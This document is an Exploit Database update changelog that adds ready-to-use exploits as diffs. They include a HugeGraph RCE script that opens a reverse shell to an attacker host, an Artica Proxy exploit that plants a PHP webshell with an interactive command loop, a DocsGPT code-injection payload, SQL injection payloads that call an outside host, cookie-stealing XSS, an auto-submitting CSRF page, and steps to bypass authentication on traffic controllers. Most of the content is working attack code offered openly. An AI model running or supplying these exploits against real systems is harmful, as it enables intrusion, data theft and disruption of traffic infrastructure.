DB: 2025-04-10

10 changes to exploits/shellcodes/ghdb

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Artica Proxy 4.50 - Remote Code Execution (RCE)

ChurchCRM 5.9.1 - SQL Injection

PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

DocsGPT 0.12.0 - Remote Code Execution

exploits/java/webapps/52149.py

@@ -0,0 +1,56 @@
+# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
+# Exploit Author: Yesith Alvarez
+# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
+# Version: Apache HugeGraph 1.0.0 - 1.2.0
+# CVE : CVE-2024–27348
+
+from requests import Request, Session
+import sys
+import json
+
+def title():
+    print('''
+
+   ______     _______     ____   ___ ____  _  _        ____ _____ _____ _  _    ___
+  / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ \___  |___ /| || |  ( _ )
+ | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ __) | / /  |_ \| || |_ / _ \
+ | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ __/ / /  ___) |__   _| (_) |
+  \____|  \_/  |_____|   |_____|\___/_____|  |_|      |_____/_/  |____/   |_|  \___/
+
+[+] Reverse shell
+Author: Yesith Alvarez
+Github: https://github.com/yealvarez
+Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
+Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
+    ''')
+
+
+def exploit(url, lhost, lport):
+    payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
+    headers = {
+    'Content-Type': 'application/json'}
+    s = Session()
+    url = url + "/gremlin"
+    req = Request('POST', url, json=payload, headers=headers)
+    prepped = req.prepare()
+    del prepped.headers['Content-Type']
+    resp = s.send(prepped,
+    verify=False,
+    timeout=15)
+    print(prepped.headers)
+    print(url)
+    print(resp.headers)
+    print(payload)
+    print(resp.status_code)
+    print(resp.text)
+
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 4):
+        print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
+        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
+        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
+        exit(0)
+    else:
+        exploit(sys.argv[1],sys.argv[2],sys.argv[3])

exploits/multiple/webapps/52148.txt

@@ -0,0 +1,62 @@
+# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of
+Privilege Vulnerability
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/products/ad-manager/
+# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
+# Version: ADManager Plus Build < 7210
+# Tested against: Build 7203
+# CVE: CVE-2024-24409
+
+
+# Description
+The Modify Computers is a predefined role in ADManager for managing
+computers. If a technician user has the Modify Computers privilege
+over a computer can change the userAccountControl and
+msDS-AllowedToDelegateTo attributes of the computer object. In this
+way, the technician user can set Constrained Kerberos Delegation over
+any computer within the Organizational Unit that the user was
+delegated.
+
+Contrary to what ADManager claims the user who has the Modify
+Computers role can change the privilege of computer objects in the
+Active Directory. The Constrained Kerberos Delegation can be set for
+any service such as CIFS, LDAP, HOST services. Then the user can
+access these services by abusing the Constrained Kerberos Delegation.
+In addition, the Unconstrained Kerberos Delegation can be set over the
+computer objects by changing the userAccountControl attribute.
+Normally, only users that have SeEnableDelegationPrivilege privilege
+can set constrained kerberos delegation. Only members of the
+BUILTIN\Administrators group have this privilege by default. The
+delegated user for an Organizational Unit can not set constrained
+kerberos delegation even if a user has the GenericAll right over a
+computer account, so the delegation process in Active Directory does
+not grant this privilege. However, the technician user can use the
+SeEnableDelegationPrivilege right via the Modify Computers role.
+
+# Vulnerability reasons
+1. ADMP Web App Authorization issue: Assigning a predefined Modify
+Computers role delegates the technician user to modify custom
+attributes of computers unexpectedly. Even though it appears that this
+privilege is not granted in the UI, the Additional Custom Attribute
+property is assigned and this leads to broken access control
+vulnerability.
+
+2. There is no restriction for editing the userAccountControl and
+msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP
+application performs changes with domain admin privileges as designed
+so that if we can bypass some restrictions (e.g. format of attribute
+value), our requests are applied with domain admin privileges. This
+way we can edit the attributes userAccountControl and
+msDS-AllowedToDelegateTo.
+
+# Impact
+A technician user elevates privileges from Domain User to Domain
+Admin. For example, the user can set Constrained Kerberos Delegation
+over CLIENT1$ for the CIFS service of the domain controller and access
+the CIFS service. As a result, the user is delegated to manage
+CLIENT1$ but he can access the CIFS service of the domain controller
+impersonating a user unexpectedly.
+
+# Proof Of Concept
+https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409

exploits/multiple/webapps/52151.txt

@@ -0,0 +1,24 @@
+# Exploit Title: MaxTime Database Editor 1.9 Authentication Bypass
+# Google Dork: N/A
+# Date: 07/09/2024
+# Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com
+# Vendor Homepage: https://www.q-free.com
+# Software Link: N/A
+# Version: 1.9
+# Tested on:  (Intelight x-1) Linux 3.14.57
+# CVE : CVE-2024-38944
+
+## Vulnerability Description
+This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor.
+Authentication is not required to exploit this vulnerability.
+
+The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware.
+The issue results from the lack of authentication prior to allowing access to functionality.
+An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection,
+modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion.
+
+## Steps to Reproduce
+
+Navigate to the IP address of an identified controller
+When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address
+Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.

exploits/php/webapps/52146.py

@@ -0,0 +1,78 @@
+# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web
+application insecure deserialization (RCE)
+# Google Dork:
+# Date: 23-04-2024
+# Exploit Author: Madan
+# Vendor Homepage: https://artica-proxy.com/
+# Version: 4.40, 4.50
+# Tested on: [relevant os]
+# CVE : CVE-2024-2054
+
+you can also find the exploit on my github repo:
+https://github.com/Madan301/CVE-2024-2054
+
+
+import requests
+import base64
+import urllib3
+from colorama import Fore
+
+print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
+sometimes vary from how artica proxy interface is hosted")
+
+URL = input("Enter url: ")
+if URL[-1]=="/":
+    ACTUAL_URL = URL[:-1]
+else:
+    ACTUAL_URL = URL
+
+ARTICA_URL = ACTUAL_URL
+
+def check(ARTICA_URL):
+    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+    try:
+        check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
+    except Exception as e:
+        print(Fore.RED+"Could not reach, check URL")
+    if check.status_code==200:
+        print(Fore.GREEN+"Vulnerable")
+        return True
+    else:
+        print(Fore.RED+"Not Vulnerable")
+
+
+def exploit(ARTICA_URL):
+
+    payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
+    payload_data = {
+        "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
+            "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
+            "cache_serializer": "json",
+            "cache_size": 999999999,
+            "cache_data": {
+                payload: {
+                    "cache_date": 0,
+                    "ttl": 999999999
+                }
+            }
+        }
+    }
+
+
+    while True:
+        PAYLOAD_CMD = input("enter command: ")
+        url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
+        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+        response = requests.get(url, verify=False)
+        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+        if response.status_code == 200:
+            cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
+            cmd_response = requests.get(cmd_url, verify=False)
+            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+            print(cmd_response.text)
+        else:
+            print("Failed to execute the payload")
+
+check = check(ARTICA_URL=ACTUAL_URL)
+if check==True:
+    exploit(ARTICA_URL=ARTICA_URL)

exploits/php/webapps/52147.NA

@@ -0,0 +1,39 @@
+# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
+# Date: 04/28/2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://anchorcms.com/
+# Software Link:
+https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
+# Version: latest
+# Tested on: MacOS
+
+# Log in to Anchor CMS.
+# Click on "Create New Post".
+# Fill in the "Title" and enter the following payload in the field
+immediately below:
+# "><script>alert()</script>
+# Go to the homepage, and you will see the alert!
+
+
+### PoC Request ###
+
+POST /anchor/admin/posts/edit/2 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
+Gecko/20100101 Firefox/124.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 278
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/anchor/admin/posts/edit/2
+Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
+anchorcms=hlko7b1dbdpjgn58himf2obht5
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false

exploits/php/webapps/52150.NA

@@ -0,0 +1,69 @@
+# Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting
+via Content Form
+# Date: 8-7-2024
+# Category: Web Application
+# Exploit Author: Jeremia Geraldi Sihombing
+# Version: 2.10.1
+# Tested on: Windows
+# CVE: CVE-2024-39143
+
+Description:
+----------------
+A stored cross-site scripting (XSS) vulnerability exists in
+ResidenceCMS 2.10.1 that allows a low-privilege user to create
+malicious property content with HTML inside it, which acts as a
+stored XSS payload. If this property page is visited by anyone
+including the administrator, then the XSS payload will be triggered..
+
+Steps to reproduce
+-------------------------
+
+1. Login as a low privilege user with property edit capability.
+
+2. Create or Edit one of the user owned property
+(We can user the default property owned by the user).
+3. Fill the content form with XSS payload using the Code View feature.
+Before saving it make sure to go back using the usual view to see if the HTML
+is rendered or not.
+
+Vulnerable parameter name: property[property_description][content]
+
+Example Payload: <img src="x" onerror="alert(document.cookie)">
+
+4. After saving the new property content and clicking the 'Finish Editing',
+go to the page and see the XSS is triggered.
+It is possible to trigger the XSS by using any account or even
+unauthorized account.
+
+Burp Request
+-------------------
+
+POST /en/user/property/7/edit HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
+Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1111
+Origin: http://localhost
+Connection: keep-alive
+Referer: http://localhost/en/user/property/7/edit
+Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
+PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Priority: u=1
+
+property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
+renovated 2-bedroom 2-bathroom
+flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
+renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
+Blvd, Tampa, FL
+33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
+src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg

exploits/php/webapps/52152.NA

@@ -0,0 +1,148 @@
+## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection
+
+## Author: Sanan Qasimzada
+
+## Date: 06.07.2024
+
+## Vendor: http://churchcrm.io/
+
+## Software: https://github.com/ChurchRM/CRM
+
+## Reference: https://portswigger.net/web-security/sql-injection
+
+
+
+## Description:
+
+In the manual insertion point 1 - parameter `EID` appears to be
+
+vulnerable to SQL injection attacks.
+
+No need for cookies, no need admin authentication and etc.
+
+The attacker easily can steal information from this system by using
+
+this vulnerability.
+
+
+
+STATUS: HIGH Vulnerability - CRITICAL
+
+
+
+[+]Payload:
+
+```mysql
+
+---
+
+Parameter: EID (GET)
+
+    Type: boolean-based blind
+
+    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+
+    Payload: EID=(select
+
+load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
+\\ior'))
+
+OR NOT 2407=2407
+
+
+
+    Type: time-based blind
+
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+    Payload: EID=(select
+
+load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
+\\ior'))
+
+AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
+
+
+
+    Type: UNION query
+
+    Title: MySQL UNION query (UTF8) - 11 columns
+
+    Payload: EID=(select
+
+load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
+\\ior'))
+
+UNION ALL SELECT
+
+'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
+
+---
+
+
+
+```
+
+
+
+## Reproduce:
+
+[href](
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1
+)
+
+
+
+## Proof and Exploit:
+
+[href](https://streamable.com/1eqhw2)
+
+
+
+## Time spend:
+
+01:00:00
+
+
+
+
+
+--
+
+System Administrator - Infrastructure Engineer
+
+Penetration Testing Engineer
+
+Exploit developer at
+
+https://packetstormsecurity.com/https://cve.mitre.org/index.html and
+
+https://www.exploit-db.com/
+
+home page: https://www.nu11secur1ty.com/
+
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+
+                          nu11secur1ty <http://nu11secur1ty.com/>
+
+
+
+--
+
+System Administrator - Infrastructure Engineer
+
+Penetration Testing Engineer
+
+Exploit developer at https://packetstormsecurity.com/
+
+https://cve.mitre.org/index.html
+
+https://cxsecurity.com/ and https://www.exploit-db.com/
+
+0day Exploit DataBase https://0day.today/
+
+home page: https://www.nu11secur1ty.com/
+
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+
+                          nu11secur1ty <http://nu11secur1ty.com/>

exploits/php/webapps/52153.NA

@@ -0,0 +1,54 @@
+# Exploit Title: pz-frontend-manager <= 1.0.5 - CSRF change user profile
+picture
+# Date: 2024-07-01
+# Exploit Author: Vuln Seeker Cybersecurity Team
+# Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/
+# Version: <= 1.0.5
+# Tested on: Firefox
+# Contact me: vulns@vulnseeker.org
+
+The plugin does not have CSRF checks in some places, which could allow
+attackers to make logged in users perform unwanted actions via CSRF attacks.
+
+Proof of concept:
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: localhost:10003
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
+Gecko/20100101 Firefox/124.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 1093
+Origin: http://localhost:10003
+Sec-GPC: 1
+Connection: close
+Cookie: Cookie
+
+action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1
+
+
+CSRF Exploit:
+
+<html>
+  <body>
+    <form action="http://localhost:10003/wp-admin/admin-ajax.php"
+method="POST">
+      <input type="hidden" name="action" value="pzfm_upload_avatar" />
+      <input type="hidden" name="imageData"
+value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg=="
+/>
+      <input type="hidden" name="userID" value="1"" />
+      <input type="submit" value="Submit request" />
+    </form>
+    <script>
+      history.pushState('', '', '/');
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+Profile picture of user 1 will be changed in the dashboard
+http://localhost:10003/dashboard/?dashboard=profile
+
+Reference:
+https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/

exploits/python/webapps/52145.py

@@ -0,0 +1,33 @@
+# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
+# Date: 09/04/2025
+# Exploit Author: Shreyas Malhotra (OSMSEC)
+# Vendor Homepage: https://github.com/arc53/docsgpt
+# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
+# Version: 0.8.1 through 0.12.0
+# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
+# CVE: CVE-2025-0868
+
+import requests
+
+# TARGET CONFIG
+TARGET = "http://10.0.2.15:7091"  # Change this
+
+# Malicious payload string - carefully escaped - modify the python code if necessary
+malicious_data = (
+    'user=1&source=reddit&name=other&data={"source":"reddit",'
+    '"client_id":"1111","client_secret":1111,"user_agent":"111",'
+    '"search_queries":[""],"number_posts":10,'
+    '"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
+)
+
+headers = {
+    "Content-Type": "application/x-www-form-urlencoded"
+}
+
+try:
+    response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
+    print(f"[+] Status Code: {response.status_code}")
+    print("[+] Response Body:")
+    print(response.text)
+except Exception as e:
+    print(f"[-] Error sending request: {e}")

files_exploits.csv

@@ -5471,6 +5471,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39886,exploits/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",webapps,java,,2016-06-06,2016-06-14,1,,,,,http://www.exploit-db.comapache-continuum-1.4.2-bin.tar.gz,
 49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,,2021-01-08,2021-01-08,1,CVE-2020-17519,,,,,
 48978,exploits/java/webapps/48978.py,"Apache Flink 1.9.x - File Upload RCE (Unauthenticated)",2020-11-02,bigger.wing,webapps,java,,2020-11-02,2020-11-02,0,,,,,,
+52149,exploits/java/webapps/52149.py,"Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)",2025-04-09,"Yesith Alvarez",webapps,java,,2025-04-09,2025-04-09,0,CVE-2024-27348,,,,,
 37110,exploits/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",webapps,java,8080,2015-05-26,2017-11-02,0,CVE-2015-1833;OSVDB-122382,,,,,
 45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java,,2018-10-24,2018-10-25,0,,"XML External Entity (XXE)",,,,
 48408,exploits/java/webapps/48408.txt,"Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)",2020-05-01,"Faiz Ahmed Zaidi",webapps,java,,2020-05-01,2020-05-01,0,CVE-2019-0235,,,,,
@@ -11991,6 +11992,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",2021-01-05,MoeAlBarbari,webapps,multiple,,2021-01-05,2021-01-05,0,CVE-2020-29597,,,,,
 48693,exploits/multiple/webapps/48693.go,"INNEO Startup TOOLS 2018 M040 13.0.70.3804 - Remote Code Execution",2020-07-26,"Patrick Hener",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2020-15492,,,,,
 34408,exploits/multiple/webapps/34408.txt,"Innovaphone PBX Admin-GUI - Cross-Site Request Forgery",2014-08-25,"Rainer Giedat",webapps,multiple,80,2014-08-25,2014-08-25,0,CVE-2014-5335;OSVDB-110269,,,,,
+52151,exploits/multiple/webapps/52151.txt,"Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)",2025-04-09,"Andrew Lemon/Red Threat",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-38944,,,,,
 14004,exploits/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65973,,cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf,,,
 14001,exploits/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65774,,cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf,,,
 49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,,2020-12-03,2021-01-06,0,CVE-2020-29477,,,,,
@@ -12452,6 +12454,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50233,exploits/multiple/webapps/50233.py,"ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"numan türle",webapps,multiple,,2021-08-30,2021-08-30,0,,,,,,
 46895,exploits/multiple/webapps/46895.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - Cross-Site Scripting",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12189,,,http://www.exploit-db.com/screenshots/idlt47000/1.jpg,,
 46894,exploits/multiple/webapps/46894.txt,"Zoho ManageEngine ServiceDesk Plus < 10.5 - Improper Access Restrictions",2019-05-22,Vingroup,webapps,multiple,,2019-05-22,2019-05-22,0,CVE-2019-12252,,,,,
+52148,exploits/multiple/webapps/52148.txt,"Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege",2025-04-09,"Metin Yunus Kandemir",webapps,multiple,,2025-04-09,2025-04-09,0,CVE-2024-24409,,,,,https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
 46788,exploits/multiple/webapps/46788.txt,"Zotonic < 0.47.0 mod_admin - Cross-Site Scripting",2019-05-03,"Ramòn Janssen",webapps,multiple,,2019-05-03,2019-05-03,0,CVE-2019-11504,,,,http://www.exploit-db.comzotonic-0.46.0.zip,
 22490,exploits/multiple/webapps/22490.txt,"ZPanel 10.0.1 - Cross-Site Request Forgery / Cross-Site Scripting / SQL Injection / Password Reset",2012-11-05,pcsjj,webapps,multiple,,2012-11-05,2012-11-07,1,CVE-2012-5686;CVE-2012-5685;CVE-2012-5684;CVE-2012-5683;OSVDB-87142;OSVDB-87141;OSVDB-87140;OSVDB-87139,,,,http://www.exploit-db.comzpanelx-1_0_0.zip,
 35012,exploits/multiple/webapps/35012.txt,"ZYXEL P-660R-T1 V2 - 'HomeCurrent_Date' Cross-Site Scripting",2010-11-23,"Usman Saeed",webapps,multiple,,2010-11-23,2014-10-20,1,,,,,,https://www.securityfocus.com/bid/45027/info
@@ -14123,6 +14126,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
